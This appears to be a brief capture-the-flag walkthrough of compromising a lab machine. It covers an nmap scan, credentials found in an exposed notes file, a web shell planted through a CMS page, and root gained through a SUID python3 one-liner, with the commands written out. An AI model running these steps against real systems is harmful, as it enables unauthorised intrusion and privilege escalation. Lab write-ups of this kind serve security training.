Start by scanning the target with nmap –A –T4 –p- 192.168.1.2 –vv

While running dirb i visited port 8080 and i found the page has a picture of note and when viewing the source we can see this:

So visiting 192.168.1.2:8080/mynotes.txt when can find:

User admin
Password adminadmin2
Now as i said i was running dirb and gave us some results, one of them is a page to log http://192.168.1.2/backend in with these credentials:


And we got in:

Now the CMS is php restricted, means we can’t upload a php pr php5 files, but we can upload a simple shell command on the site webpage, navigate to http://192.168.1.2/backend/cms and add a page and then we write a function inside it the shell:

And as you can see we got in, then we escape the shell by python3 -c ‘import pty; pty.spawn(“/bin/bash”)’ and then bash –p

Now using find / -perm –u=s –type f 2>/dev/null we found we can use python3 to priv escalate:

All we have to do is write a command and we are root:
python3 -c ‘import os; os.execl(“/bin/sh”, “sh”, “-p”)’
